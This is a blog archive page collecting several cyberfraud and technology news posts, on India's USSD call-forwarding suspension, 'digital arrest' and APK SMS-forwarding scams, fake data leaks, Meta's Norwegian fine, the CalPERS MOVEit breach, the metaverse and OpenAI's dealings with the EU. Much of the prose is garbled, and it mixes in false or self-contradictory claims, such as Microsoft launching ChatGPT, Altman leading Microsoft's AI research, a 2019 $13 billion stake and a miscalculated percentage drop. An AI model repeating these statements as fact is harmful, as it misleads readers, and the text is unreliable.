Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Cyberfraud. Show all posts
USSD
Call Forward criminals Cyber Security Cyberattacks CyberCrime Cyberfraud CyberThreat Mobile USSD

USSD Call Forwarding Deactivation: India's Move to Safeguard Against Cyber Fraud

 


The Department of Telecommunications (DoT) has recently taken a step to tackle the surge in online fraud cases across the country. To counter various incidents of fraud resulting from illegal call forwarding, the authorities have required all telecom operators in the country to allow their USSD-based call forwarding services to be deactivated from April 15, 2024.  

In other words, USSD (Unstructured Supplementary Service Data) is a technology that makes it possible for mobile users to gain access to a wide variety of services provided by phone networks by dialling shortcodes such as *401#. Criminals impersonate customer support to trick users into dialing this code followed by their number and into being tricked by them. 

As a result, the fraudster will usually be able to receive all phone calls and forward them to him. The USSD (Unstructured Supplementary Service Data) is commonly used by users to check balances, block numbers, and other information with the option of dialling simple codes. As a result, such social engineering attacks are vulnerable to this particular system by the DoT. 

Several services can assist users with this, including call forwarding, as well as phone number rerouting. In addition to checking mobile phone balances and IMEI numbers, the service is also commonly used to check the health of mobile phones. An order has been issued as a result of an ongoing investigation into frauds involving mobile phones and online crimes that have been committed. 

In making this decision, they do so in response to a rising number of concerns about fraud, and misuse, as well as the increasing number of online scams occurring in the wake of the call forwarding feature. Once users suspend the service for their number, users will need to reactivate any call forwarding that has been set up on it. If they already have it enabled, they will have to reactivate it. 

There have been rumours, however, that users may have to use alternative methods of activating call forwarding, which has yet to be specified, to perform this functionality. The traditional ways for users to manage the forwarding of their calls will now need to be replaced by alternative ways for providers to do so. The suspension of USSD-based call forwarding services comes amid concerns about the susceptibility of such services to fraudulent activities within the telecommunications sector. 

While the request does not imply a permanent removal of the service, there are speculations that it may be reintroduced in the future with enhanced security measures to prevent misuse and fraud. Telecommunications fraud often involves cybercriminals exploiting vulnerabilities within call forwarding systems to unlawfully access sensitive information. 

One prevalent tactic utilized by fraudsters involves persuading unsuspecting users to enable call forwarding to alternative phone numbers via USSD commands. Once activated, these diverted calls serve as a conduit for intercepting confidential data, such as one-time passwords (OTPs), intended for authentication purposes. 

The USSD service, accessed by inputting specific codes on mobile keypads, offers various functionalities including prepaid balance checks and IMEI retrieval. Among these functions is the activation of unconditional call forwarding, a feature now under scrutiny due to reported instances of misuse. 

The DoT's directive to deactivate USSD-based call forwarding represents a proactive measure aimed at disrupting fraudulent schemes. By eliminating this option, telecom operators can thwart fraudsters from exploiting the feature for illicit activities. This action not only protects mobile phone users but also bolsters the integrity of the telecommunications infrastructure.

In summary, the mandated suspension of USSD-based call forwarding services marks a significant stride in combating fraudulent practices in the telecommunications realm. By depriving fraudsters of a crucial tool, the DoT's initiative contributes to the advancement of cybersecurity and fosters a safer digital landscape for both consumers and businesses.
Read more »
Money Scam
Cyber Crime Cyber Extortion Cyberfraud Digital Arrest Money Scam

Digital Arrest Scam: Woman Doctor Duped for 40 Lakhs, Loses Her Entire Savings

Digital Arrest Scam

In today’s digital world, our lives are interconnected through the internet. From shopping on the web and managing finances to connecting with our loved ones, everything is done online these days. 

But the comfort also comes with some risks. 

Professor scammed with Rs 40 Lakhs 

In a recent online scam, a government medical university professor fell victim to a “digital arrest” scam and was tricked into paying a heavy amount of Rs 40 lakhs. The scam technique is called “digital arrest” where a scammer fools the victim under the disguise of law enforcement agencies. 

“An arrest warrant has been issued in your name. All your financial accounts will be frozen and they will be investigated. Till then you are put under ‘digital arrest’. After that they called me on Skype and showed me many documents which included my phone number, Aadhaar number, and which also included my arrest warrant,” she said.

The Attack: What happened?

On March 11, the professor received a call purportedly from Maharashtra. The caller alleged that a phone number issued under her ID in July 2023 was involved in illegal activities, including text message scams, phishing, and money laundering.

The call was then transferred to another individual claiming to be from the Maharashtra police headquarters. This person accused her of opening a fraudulent account in Canara Bank, Mumbai, leading to money laundering activities. The caller even spoke about an arrest warrant issued in her name.

The scammer threatened her, stating that all her financial cards, PAN, and Aadhaar had been blocked. They claimed she was under ‘digital arrest’.

To add to her distress, the scammers showed her documents via Skype, including her phone number, Aadhaar number, and the alleged arrest warrant.

The professor was coerced into transferring a staggering amount of Rs 31.31 lakh on March 11, followed by Rs 9 lakh from another account the next day.

The scammers instructed her to maintain constant communication, provide personal information, and refrain from contacting anyone else, citing national security concerns and the purported involvement of police and bank officials in the scam.

Realizing she had fallen victim to cyber fraud, she promptly reported the incident to the cybercrime police station and filed a formal complaint.

Impact of the attack

According to police, “A staggering amount of Rs 31.31 lakh was transferred by her on March 11, followed by Rs 9 lakh from another account the next day.” 

The stolen money was the professor’s entire savings, which she had kept for her kids’ studies and her future.

Triveni Singh, a former SP in the Cyber Cell and a cyber expert said that no reputable agency will request a Skype chat for reasons of investigation or arrest. There's nothing like a 'digital arrest'.


Read more »
threats
Cyberattacks Cyberfraud Darkweb Data Breach data security Deception Exploitation Fabrication Leaks Misinformation Ransomware threats

Decoding Cybercriminals' Motives for Crafting Fake Data Leaks

 

Companies worldwide are facing an increasingly daunting challenge posed by data leaks, particularly due to the rise in ransomware and sophisticated cyberattacks. This predicament is further complicated by the emergence of fabricated data leaks. Instead of genuine breaches, threat actors are now resorting to creating fake leaks, aiming to exploit the situation.

The consequences of such falsified leaks are extensive, potentially tarnishing the reputation of the affected organizations. Even if the leaked data is eventually proven false, the initial spread of misinformation can lead to negative publicity.

The complexity of fake leaks warrants a closer examination, shedding light on how businesses can effectively tackle associated risks.

What Drives Cybercriminals to Fabricate Data Leaks?

Certain cybercriminal groups, like LockBit, Conti, Cl0p, and others, have gained significant attention, akin to celebrities or social media influencers. These groups operate on platforms like the Dark Web and other shadowy websites, and some even have their own presence on the X platform (formerly Twitter). Here, malicious actors publish details about victimized companies, attempting to extort ransom and setting deadlines for sensitive data release. This may include private business communications, corporate account login credentials, employee and client information. Moreover, cybercriminals may offer this data for sale, enticing other threat actors interested in using it for subsequent attacks.

Lesser-known cybercriminals also seek the spotlight, driving them to create fake leaks. These fabricated leaks generate hype, inducing a concerned reaction from targeted businesses, and also serve as a means to deceive fellow cybercriminals on the black market. Novice criminals are especially vulnerable to falling for this ploy.

Manipulating Databases for Deception: The Anatomy of Fake Leaks

Fake data leaks often materialize as parsed databases, involving the extraction of information from open sources without sensitive data. This process, known as internet parsing or web scraping, entails pulling text, images, links, and other data from websites. Threat actors employ parsing to gather data for malicious intent, including the creation of fake leaks.

In 2021, a prominent business networking platform encountered a similar case. Alleged user data was offered for sale on the Dark Web, but subsequent investigations revealed it was an aggregation of publicly accessible user profiles and website data, rather than a data breach. This incident garnered media attention and interest within the Dark Web community.

When offers arise on the Dark Web, claiming to provide leaked databases from popular social networks like LinkedIn, Facebook, or X, they are likely to be fake leaks containing information already publicly available. These databases may circulate for extended periods, occasionally sparking new publications and causing alarm among targeted firms.

According to Kaspersky Digital Footprint Intelligence, the Dark Web saw an average of 17 monthly posts about social media leaks from 2019 to mid-2021. However, this figure surged to an average of 65 monthly posts after a significant case in the summer of 2021. Many of these posts, as per their findings, may be reposts of the same database.

Old leaks, even genuine ones, can serve as the foundation for fake leaks. Presenting outdated data leaks as new creates the illusion of widespread cybercriminal access to sensitive information and ongoing cyberattacks. This strategy helps cybercriminals establish credibility among potential buyers and other actors within underground markets.

Similar instances occur frequently within the shadowy community, where old or unverified leaks resurface. Data that's several years old is repeatedly uploaded onto Dark Web forums, sometimes offered for free or a fee, masquerading as new leaks. This not only poses reputation risks but also compromises customer security.

Mitigating Fake Leaks: Business Guidelines

Faced with a fake leak, panic is a common response due to the ensuing public attention. Swift identification and response are paramount. Initial steps should include refraining from engaging with attackers and conducting a thorough investigation into the reported leak. Verification of the source, cross-referencing with internal data, and assessing information credibility are essential. Collecting evidence to confirm the attack and compromise is crucial.

For large businesses, including fake leaks, data breaches are a matter of "when," not "if." Transparency and preparation are key in addressing such substantial challenges. Developing a communication plan beforehand for interactions with clients, journalists, and government agencies is beneficial. 

Additionally, constant monitoring of the Dark Web enables detection of new posts about both fake and real leaks, as well as spikes in malicious activity. Due to the automation required for Dark Web monitoring and the potential lack of internal resources, external experts often manage this task.

Furthermore, comprehensive incident response plans, complete with designated teams, communication channels, and protocols, facilitate swift action if such cases arise.

In an era where data leaks continuously threaten businesses, proactive and swift measures are vital. By promptly identifying and addressing these incidents, conducting meticulous investigations, collaborating with cybersecurity experts, and working with law enforcement, companies can minimize risks, safeguard their reputation, and uphold customer trust.
Read more »
Social Media
Cyberattacks CyberCrime Cyberfraud data threat Facebook Privacy Social Media

Fines for Facebook Privacy Breaches in Norway Crack Down on Meta

 


A fine of 1 million crowns ($98,500) will be imposed on the owner of Facebook, Meta Platforms, by the Norwegian Data Protection Authority (Datatilsynet) starting August 14 due to a privacy breach that occurred before that date. A significant penalty of this magnitude could have major implications for other countries in Europe as well since it may set a precedent.

In a court filing, Meta Platforms has requested that a court in Norway stay a fine imposed by the Nordic country's information regulator on the company that owns Facebook and Instagram. It argued that the company breached users' privacy via Facebook and Instagram. 

It appears that Meta Platforms has filed a court filing requesting a temporary injunction against the order to prevent execution. During a two-day hearing to be held on August 22, the petition will be presented by the company. Media inquiries should be directed to Meta company's Norwegian lawyer, according to company's Norwegian lawyer. An inquiry for comment was not responded to by Meta Platforms. 

According to Datatilsynet, Meta Platforms have been instructed not to collect any personal data related to users in Norway, including their physical locations as part of behavioral advertising, i.e. advertising that is targeted at specific user groups. 

Big Tech companies tend to do this type of thing a lot. Tobias Judin, Head of Datatilsynet's international section, said that the company will be fined 1 million crowns per day as of next Monday if the company does not comply with the court order. 

Meta Platforms have filed a court protest against the imposition of the fine, according to Norway's data regulator, Datatilsynet. Datatilsynet will be able to make the fine permanent by referring the decision to the European Data Protection Board, which also holds the authority to endorse the Norwegian regulator's decision, after which the fine will be effective until November 3 at which point it could be made permanent by the Norwegian regulator. 

Successful adoption of this decision would have an impact on the entire European region if it were to be approved. Currently, Datatilsynet has not taken any further steps in implementing these measures. In a recent announcement, Meta announced that it intends to seek consent from users in the European Union before allowing businesses to use targeted advertisements based on how they interact with Meta's services like Instagram and Facebook. 

Judin pointed out that Meta's proposed method of seeking consent from users was insufficient and that such a step would not be wise. As a result, he required Meta to immediately cease all data processing, and not to resume it until a fully functional consent mechanism had been established. There is a violation of people's rights with the implementation of Monday, even though many people are unaware of this violation. 

A Meta spokesperson explained that the decision to modify their approach was prompted by regulatory obligations in the European region, which came as a result of an order issued in January by the Irish Data Protection Commissioner regarding EU-wide data protection regulations. 

According to the Irish authority, which acts as Meta's primary regulator within the European Union, the company is now required to review the legal basis of the methods that it uses to target customers with advertisements. While Norway may not be a member of the European Union, it remains a member of the European Single Market, even though it is not a member of the EU.
Read more »
Quick Heal
CNBC Cyber Attacks Cyber Fraudester Cyber Scam CyberCrime Cyberfraud Metro Cities NCRB Quick Heal

Elevated Cybercrime Risks in Metro Cities: Understanding Urban Vulnerabilities

 


In metropolitan cities, cyber fraudsters understand how people think. It is not surprising that they provide certain services so quickly and efficiently to people with busy lives. Experts have found that this puts them at a higher risk of scams. With the help of cyber security pundits and regular victims of this problem, CNBC-TV18 gets to the bottom of the problem. 

Major metropolitan cities are seen as prime targets for cybercriminals as cybercrime becomes more common. They set up more operations to achieve their goals.  It is possible to estimate the gravity of the situation by looking at Chennai, which has been the victim of nearly 8 million malware-related attacks in its history alone.  

Metropolitan cities are more vulnerable to cybercrimes as they have a lot of digital infrastructure and online services available to them. However, they lack strong data protection policies for their customers. The rise in cybercrime focuses cybercriminals' attention on the major metropolitan areas of the country. 

By simply looking at Chennai's condition, which received nearly 8 million malware-related attacks last year, one can determine the gravity of the situation, which can be calculated by looking at the condition there.

It has been announced by QuickHeal that more than 80,000 malware threats are detected and blocked every hour of the day, according to their official report. It has been estimated that there have been more than 1.91 million ransomware attacks to date. There have been numerous attacks resulting from the pandemic that have been used to benefit attackers. Arogya Setu is an app that you need to install on your smartphone if you want to attend Arogya Setu classes. 

People and organizations needed to track Covid-19-related information on the internet and social media regularly. Due to this, attackers were able to take advantage of it and created fake COVID-19 links to spread these links. 

Users clicked on the links in these messages, and malicious files were loaded onto their systems. Many of these files were detected and blocked by antivirus software. It was not only covid-19 that was included in the phishing links, but also other things like offers for jobs, free internet, online money, and other interesting things as well.  

Among the services QuickHeal provides, it has been reported that people are starting to become more familiar with the use of digital tools and antivirus software to protect their computers. Despite all this, there is still a long way to go since Internet usage is not considered a healthy activity by most people.  

In the order of most detected malware, the following were the most detected malware types: Trojans, Infectors, Worms, and Potentially Unwanted Applications (PUAs). The threat landscape still has its place for ransomware as it continues to encrypt sensitive user information, which is then sold on the dark web by attackers in exchange for money. 

Cybersecurity experts do not take data security very seriously and rely on third parties to maintain their data. According to these experts, many of these companies outsource their data maintenance to third parties. These third parties then sell the data to cyber criminals and cyber criminals get easy access to the data. Having more data means more opportunities for cyber fraudsters to commit fraud.

In 2019, according to the National Crime Record Bureau, there were 18,500 cases of cyber fraud reported in 19 metropolitan cities of the country, which accounted for 41 percent of the total cases of cyber fraud detected in the country. This number increased marginally in 2020 as 18,657 cases were reported in the metropolises of India - 37 percent of India's total number of cases that year. 

In contrast, cyber fraud cases in metropolitan cities have decreased since 2021, according to statistics - there were 17,115 reported cases - accounting for 32 percent of the total cases relating to cyber fraud in India. It is estimated that there are many more cases than reported, according to experts. 

As a result of the high number of cybercrime incidents targeting metropolitan cities, the authorities are aware of this problem. Several states and cities have created specialized cyber cells to combat such frauds, and they work together. Although, these authorities allege that operation hurdles have made it difficult to eradicate such crimes, which makes bringing them down difficult. 

When a person has realized that they have been scammed by a scammer, experts recommend that they log onto the cybercrime portal or call 1930 immediately. The experts suggest that any request for personal information, such as debit or credit card pins, or a one-time password should raise red flags and should be reported as soon as possible. 

Furthermore, these experts urge that all online transactions should only be carried out through secure, verified portals, and individuals should not upload sensitive documents or information to unverified or unknown portals without prior confirmation from the portal's owner.

Cybersecurity experts recommend that people avoid answering video calls from unknown numbers and not fall for lucrative offers. Anything that appears too unbelievable to be true is a scam. Thus, the best method of preventing cybercrime remains precaution and awareness. 

As per the findings of the National Crime Records Bureau (NCRB), 962 cybercrime cases were reported in India in 2014, 11592 cases were investigated in 2015, and 12,317 cases were reported in 2016. I believe that cybercrime incidents in India are increasing. 

Business is moving online, which means organizations have to ensure the network that their customers are using is safe and secure. As well as upgrading their technology, they should also hire employees with good management and security skills, who are trained in the protocols of security management, and who are adept at managing and securing sensitive customer data. 

The protection of adults' data is of paramount importance, especially for those over the age of 75. These people have an insufficient understanding of how technology works at the moment. As a result, companies and individuals both must understand how to tackle cyberattacks and educate the public about their detection. 
Read more »
Public Pension
CalPERS Cyberattacks CyberCrime Cyberfraud Cybersecurity Data Breach Public Pension

A Major Public Pension Fund Suffered a Massive Data Breach

 

It was reported Wednesday that hackers stole the names and social security numbers of around 769,000 retirees and beneficiaries of the California Public Employees' Retirement System. In addition, hackers stole their birth dates and other personal information. During the attack, the attackers exploited vulnerabilities in a contractor's cybersecurity system. In a data breach caused by a third party, some CalPERS members' personal information was exposed. 

According to the California Public Employees Retirement System, PBI Research Services/Berwyn Group was informed on June 6 that its database had a security breach. The hack was carried out using a popular application that allows file transfers between devices.

There are more than 2 million CalPERS members throughout the country, making it the largest pension fund in the country. In addition to covering the health needs of over 1.5 million members and their families, this organization also provides medical insurance. A spokesperson for CalSTRS, the second-largest public pension plan in the country, told reporters Thursday that it had also been hacked by the same vendor. However, no details were provided about the victims. CalSTRS has reported that 415,000 members and beneficiaries have been affected.  

To support accuracy in payments to retirees and beneficiaries, CalPERS uses the MOVEit Transfer Application. This application encrypts data as part of its process to prevent overpayments or other errors when processing payments to retirees or beneficiaries. CalPERS uses PBI's MOVEit Transfer services to transfer. A benefit information verification process is also carried out by this department. Millions of people all over the world use the MOVEit Transfer app, which was also impacted by the data breach as the app is used by thousands of organizations. 

CalPERS retirees and their survivors were exposed to the vulnerability that PBI has since identified and resolved. Law enforcement has also been notified of the incident. 

There are 17,000 teachers enrolled in the CalSTRS system. This is the largest teachers' retirement system in the United States and the second-most comprehensive pension fund in the world after Social Security. With more than 947,000 members, it is one of the largest mutual insurers in the world. 

As reported in CalPERS' latest release, the agency has not yet identified the vulnerability in its MOVEit Transfer Application that was reported to the agency on June 6 by its third-party vendor, PBI Research Services. This vulnerability has since been fixed. 

PBI allows CalPERS to identify death cases among its members and ensure proper payments are made to beneficiaries and retirees alike. 

CALPERS said that due to the app's vulnerability, third parties could download information such as first and last names, date of birth, and Social Security numbers by downloading the app, the organization said. There was also the possibility of accessing the names of family members. 

According to CalPERS, the breach affected neither CalPERS's information systems nor my CalPERS, which provides access to active members. Members' monthly benefit payments will also not be affected by this change.

This breach did not affect CalPERS' information security systems. Although this is true, CalPERS has incorporated new security protocols for its website, call centers, and office locations. Members will be able to continue receiving monthly pension payments as per their personal preferences in the future. 

The CalPERS Retirement System has joined forces with Experian to offer members whose personal information has been stolen a two-year credit monitoring service and an identity restoration service. Members affected by the policy change received letters outlining how to access these services and how to do so.  

It was reported on CalPERS' website earlier this week that all affected members are eligible for two years of free credit monitoring and identity restoration through Experian through an online Q&A posted there. 

The CalPERS agency mailed letters Thursday with an agency logo and a message signed by the CEO. The letters explain what options are available and how to enroll in them.

As reported by Brett Callow, threat analyst at the cybersecurity firm Emsisoft, the hackers behind the attack claim that they have hit hundreds of businesses, government agencies, and other entities throughout the world that did not protect themselves from the attack. 

Approximately 100 companies have reported personal data theft so far, Callow said, and about 30 more are expected to do so soon. In an official report issued last week, the U.S. The Health and Human Services Department announced that the flu outbreak affected millions of Americans. 

Those who have not received this letter and believe they have impacted personal information may contact 833-919-4735 to file a complaint. As for the center's operations hours, they are Monday through Friday, 6:00 a.m. up until 8:00 p.m. Pacific Time, while on Saturdays and Sundays, from 8:00 a.m. up until 5:00 p.m. 

The California Public Employees' Retirement System also encourages its members to regularly review and monitor their accounts and credit history for unauthorized transactions or activity. It also encourages them to notify local police if fraud or identity theft occurred.
Read more »
Software
APK Cyber Security Cyberattack CyberCrime Cyberfraud OTP Software

Fraudsters Target Kolkatans With Message-Forwarding Software

 


As online financial transactions became simpler and easier to conduct, the number of fraudulent transactions involving digital financial transactions also increased. Taking advantage of the increased sophistication of the fraudsters does not seem to be a problem. Cybercriminals, especially those inexperienced with financial transactions, have slowly begun using other platforms to dupe naive and gullible people after phishing and lottery scams.

Another way fraudulent activity is being carried out by fraudsters is by sending links via text messages to Kolkatans who are being targeted by them. The links on the website are the ones that notify users that a substantial amount has been credited into the accounts of these players. 

The police said that if one clicks on such a link to claim the money, the entire amount of funds may be transferred from the victim's account to the fraudsters' account and they will not even require them to share any OTP as part of the fraud. 

The UPI platform is used for several fraud types. Neither of these is a result of UPI problems but rather a consequence of deceptions by criminals. 

Analysts call it APK fraud as victims are tricked into downloading APK files that compromise their phones. This is done by clicking links sent by fraudulent parties to download APK files.  

An APK file download will result in an SMS-forwarding application being installed on the device and it will divert all incoming text messages to another number, so the victim isn't alerted when the money is debited from his or her account because the SMS will be forwarded to another number. According to an officer at the Lalbazar cyber cell, an SMS alert isn't received by the victim. 

There is a new method of gaining remote access to the phones of their victims that has become a weapon of choice for fraudsters. According to the officer, the scammers are claiming in their fake message to have received a large amount credited to their gaming account. 

It was reported by the Calcutta Telegraph that some Calcuttans who have been contacted had received messages saying: "Hi 9830xxxxx9 (mobile number of the recipient), The transaction of Rs 96793 has been completed to your (the name of the online gaming app). "

According to the police, victims of fraud never realize how they were cheated because they had never given their personal identification number to anyone else before being duped. 

According to a senior police officer, unlike other fraud attacks that are sent from random phones and do not address the recipient directly, the messages sent as part of the APK scam target specific individuals and are customized to them. 

There was a time when text messages were sent randomly, but that has changed. There is one thing though, the officer said, that makes it look authentic and trustworthy to be sending these messages to someone, and that is the phone number of the person to whom the message is addressed. 

In the immediate aftermath of clicking the link in the message, the recipient will see two attachments appear on his or her screen.

If the first attachment is clicked, a screen-sharing application will be silently installed on the phone and will allow fraudsters to gain direct access to the phone. A second attachment, if clicked, triggers the installation of an SMS forwarding product in the person's phone so that if fraudsters are using this software to carry out transactions on our bank account, the person will not receive any text messages from their bank, the officer explained.

According to Assistant Commissioner Atul V., their top priority area is creating awareness among their officers about the APK fraud, which has been a major problem for some time. 

Moreover, a cyber expert told that the APK fraud program is designed to make it difficult for the police to track down the fraudsters through the link in the message if a victim reports such a matter to the authorities. This is because the link in the message is active for a short period. 

Several people have been scammed in this way by sending text messages with spurious links. The sender then asks them to click on the link. A browser on the computer after a certain period will only be redirected to a popular search engine if you click on the link after that time. This means that the links remain active for only a few hours, if that long, then even the law-enforcement agencies will have no way to track the APK files or the transactions that have taken place after that explained a cyber expert in Kolkata.
Read more »
Virtual Reality
Artificial Intelligence Cyberattacks CyberCrime Cyberfraud Facebook Meta Metaverse vs Artificial Intelligence Social Media Technology Virtual Reality

AI: the cause of the metaverse's demise?

 


In a dramatic change from its past plans to create a virtual world known as "the metaverse," Facebook has taken a completely different direction that has not been seen before. It was a project that consumed billions of dollars and resulted in a cumulative loss of $26 billion, despite spending billions on it. As a result, Facebook and other companies were forced to die in the metaverse due to investor pressure, forcing them to pursue the latest trend: artificial intelligence.

After being abandoned by the business world, the Metaverse, a once-hot technology that promised to give users a disorienting video-game-like virtual world in which to interact awkwardly, has died years after being touted as a future new era in communication technology. It had been around for three years at that time. 

As CEO of Meta Platforms, Mark Zuckerberg abandoned his ambitious project, Metaverse, to focus on Artificial Intelligence (AI) and the AI industry. Zuckerberg was planning to launch the Metaverse as his next big thing, but he chose to quietly shelve the project indefinitely. 

Facebook's CEO Mark Zuckerberg announced in a post on Monday, 27 February, that Meta would establish an artificial intelligence product group dedicated to generative artificial intelligence. 

There was a time when the advent of the Metaverse was touted as the dawn of a dynamic, remote interactive environment. It was regarded as a turning point in technology. Despite its success, it faced severe criticism and backlash when it became the talk of the town. This was when it became a phenomenon. In recent years, people's interest in these topics has rapidly declined. Mark Zuckerberg reintroduced the metaverse concept, he is no longer pitching it to advertisers for the same reason. 

The virtual estate is becoming more popular. The price of Ethereum, the cryptocurrency that powers so much of this activity has a direct impact on the value of virtual land in this metaverse. While Ethereum prices have been volatile recently, many buyers and sellers struggle to keep up with the market. 

WeMeta also reports that virtual land parcel average sale prices have plummeted from over US$11,000 over the past year to under US$2,000, a significant drop compared to physical land parcel average sales prices. 

There has also been a remarkable 85% decline in virtual land sales in 2022. Ethereum-based metaverse projects, such as Decentraland and Sandbox, are seeing significant reductions in their valuations and other significant metrics as a result. 

In February 2022, some of the highest prices for land sold across Decentraland ever reached, at the time of this writing, an average of US$37,200 per acre. As a result, by August, their average value had fallen to US$5,100, a decrease of approximately 25 percent. Furthermore, Sandbox's average sale price dropped between US$35,500 in January and US$2,800 in August. This was with the same price falling from around US$35,500 in January. 

A substantial level of uncertainty has been introduced to the market by the volatility of cryptocurrency prices, specifically Ethereum. This has left investors uncertain about virtual investments. Furthermore, there is a lack of proper infrastructure, governance, and collaboration within this version of the metaverse at present. In that regard, it may be that some people believe the metaverse is nothing more than a marketing gimmick at the moment. 

The Metaverse has now joined the list of failed tech ideas buried at the deep end of the graveyard. The fact that the Metaverse was born and died in a way that angers the tech world shows the extent to which the industry was influenced by technology. 

As technology advances through AI, there is a real possibility of revolutionizing how consumers and businesses run their businesses. This is evidenced by the shift to AI. A chatbot powered by artificial intelligence can help automate repetitive tasks efficiently. A search engine powered by AI, such as ChatGPT, can interact with queries in a human-like fashion. As Reality Labs places more emphasis on AI, it may reduce company losses and open new possibilities for the company to tap into in the future.

AI, one of the fastest-developing fields, continues to make rapid advances in many industries today. These industries include marketing, media, and even healthcare, as the sector develops rapidly. According to Gartner, a leading research company, generative AI in these fields is predicted to grow dramatically shortly. By 2025, large organizations will create more outbound marketing messages from less than 2 percent to 30%. This is a dramatic increase from outbound marketing messages in 2022. However, generative AI won't be the only impact on society. 

In the transition from text to video, 90% of the content could be handled by AI by 2030, according to Gartner's projections. This would be possible because 90% of the content would come from AI and the rest from human input. 

Generative artificial intelligence has vast possibilities, but its access is not as wide as it could be. As an example, ChatGPT, as well as its mechanisms, are not open-sourced, meaning it is not available to the public in any way. Other companies would find it difficult to replicate this model because of this limitation. While Facebook intends to make these types of AI models smaller, this will, in turn, make them more accessible and easier to use for companies. This will enable generative AI to become more widespread and widely available in the future. 

There have been some reports suggesting that this is the end of the metaverse. However, other reports have suggested that we shouldn't think of Meta's redirection as a rejection of the metaverse at large. As an example, computer scientist Roy Amara developed Amara's Law. This states that humans often misjudge technology's timing and potential, overestimating or underestimating their short-term impact, and drastically underestimating their lasting impact in the long run. Skepticism and hype surrounding emerging technologies, such as self-driving cars, virtual reality (VR), and augmented reality (AR) are examples of this tendency. This is evident in the skepticism and hype surrounding these systems. It was once considered a fad to think that the internet would be a thing of the past. 

It may also be that AI, especially generative AI, can lead to more convincing environments and characters in the metaverse. This could lead to significant advancements in the metaverse as a whole.  

The fact is that some deny the metaverse's death and even its waning popularity. This is especially true for women. It is predicted that the metaverse will succeed in the future as many companies employ it. 

Nevertheless, for this to happen, it will be necessary to implement some structural changes within the organization. For VR headsets to be affordable and more private, they will need to be sold at a significantly lower price. 

In the beginning, all inventions were just ideas—ones that had the potential to be terrifying, despite this, as time goes on, these small technological innovations become increasingly integrated into our daily lives to such a degree that we cannot imagine a world without them any longer. It may be that the metaverse tends toward this fate. Perhaps another immersive technological invention will replace it as soon as possible, so it must be discussed whether or not it will emerge again.

A metaverse can be described as a virtual platform that creates a social network of sorts. There is potential here. Nonetheless, it should be remembered that a fully functional system should be able to integrate interactive technologies such as VR, AR, and AI. It should however be noted that generative AI does not necessarily spell the end of the metaverse itself. However, they could benefit each other's development by promoting each other's success.
Read more »
Technology
ChatGPT Cyber Crime CyberCrime Cyberfraud Cybersecurity European Market Garante Google Microsoft OpenAI Technology

OpenAI, the Maker of ChatGPT, Does not intend to Leave the European Market

 


According to the sources, the CEO of OpenAI, manager of ChatGPT, and creator of artificial intelligence technology, Sam Altman, in the past, has publicly favored regulations on AI technology development. However, more recently, he has indicated that he opposes overregulation of this technology. Reports indicate that Altman, who led Microsoft's AI research initiative, has stated that his company may leave the European Union (EU) if it can not comply with the EU rules. There has been a sudden change of heart by the top executive about his threat to leave the region in the recent past. 

In a conversation on Friday, Altman retracted a statement saying that the company might leave Europe if pending laws concerning artificial intelligence make it too difficult to comply with them. This is in response to a threat earlier in the week that OpenAI might leave the region. 

Currently, the European Union is working on the first global set of rules governing artificial intelligence. Altman on Wednesday dubbed the current draft of the EU Artificial Intelligence Act over-regulatory and “over-regulated." 

In terms of regulating artificial intelligence globally to ensure a set of rules is established, the European Union is well on its way.

Furthermore, this action by the EU is in tandem with the advocacy of OpenAI, the ChatGPT development company. This company has sought regulation of 'superintelligent' artificial intelligence. Guardian reports that the IAE has the power to prevent humanity from accidentally creating something that can destroy it if not controlled correctly. As a result, the IAE needs to act as the equivalent of the IAE. 

It is proposed that these laws would require generative AI companies to disclose copies of the content used to train their systems. This would enable them to create text and images protected by copyright. 

AI companies want to imitate performers, actors, musicians, and artists. This is to train their systems to act as though they perform the work of those individuals. 

According to Time Magazine, Mr. Altman is concerned that if OpenAI complied with the AI Act's safety and transparency restrictions, it would be technically impossible to comply. 

Rules for AI in the EU 

A set of rules for artificial intelligence in the EU has already been developed. It is estimated that within the next few years, a significant amount of copyrighted material will have been used to develop the algorithms deployed by companies, such as ChatGPT and Google's Bard, as it is determined by these regulations. 

A draft of the bill has already been drafted and approved by EU officials earlier this month, and it will be discussed by representatives of the European Parliament, the Council of the European Union, and the European Commission to finalize the details for it to be enacted into law. 

It has been reported that Google CEO Sundar Pichai has also met with European Commission officials to discuss AI regulation. According to reports, he is working with legislators in Europe to develop a voluntary set of rules or standards. This will serve as a stopgap set of guidelines or standards while AI innovation continues in Europe. 

There has been a lot of excitement and alarm around chatbots powered by artificial intelligence (AI) since Microsoft launched ChatGPT, a powerful chatbot powered by AI. Its potential has provoked excitement and concern, but it has also caused conflict with regulations around AI applications.

OpenAI CEO Sam Altman irritated EU officials in London when he told reporters that if any future regulations forced OpenAI to stop operating in the bloc because they were too tight, it might have to cease operations. 

In March, the OpenAI app was shut down by Italian data regulator Garante. Garante accused OpenAI of violating EU privacy rules, leading to a clash between OpenAI and its regulators. After instituting enhanced privacy measures for users, ChatGPT has returned online and continues to serve its customers. 

In a blitz against Google, Microsoft also made several announcements like this the following month. It announced that it would spend billions of dollars supporting OpenAI and use its technology in a variety of its products.

In recent weeks, New York-based Altman, 38, has been greeted rapturously with rapturous welcomes from leaders across the globe, such as Nigerian leaders and London politicians. 

Despite that, Thierry Breton, the bloc's industry commissioner, found his remarks on the AI Act, a regulation aimed at preventing invasive surveillance and other technologies from causing people to fear for their safety, frustrating. 

In a recent statement, OpenAI said it would award ten grants of equal value from a fund of $1 million. This was to measure the governance of AI software. Altman described it as "the process of democratically determining AI systems' behavior. 

On Wednesday, Mr. Altman attended a University College London event. He stressed that he was optimistic AI would lead to increased job creation and decreased inequality across the world.

Several meetings took place between him and Prime Minister Rishi Sunak, along with DeepMind and Anthropic AI heads. These meetings were to discuss the risks of artificial intelligence - from disinformation to national security to "existential threats" - as well as the voluntary actions and regulatory framework needed to address these risks. Some experts are concerned that super-intelligent AI systems may threaten mankind's existence. 

To implement a 'generative' Large Learning Model (LLM) system, massive sets of data are analyzed and generated to create resources.

If the law is put into effect, companies like OpenAI will be required to reveal the types of copyrighted materials they used to train their artificial intelligence systems. This is so they can produce text and images. 

According to the proposed legislation, facial recognition in public places and predictive policing tools may also be prohibited under an updated set of regulations. 

ChatGPT, backed by Microsoft, was introduced late last year and since then has grown exponentially, reaching 100 million users monthly in a matter of weeks. It is the fastest-growing consumer application in history. 

As part of its commitment to integrate OpenAI technology into all of its products, Microsoft acquired a 13 billion dollar stake in the company in 2019. 

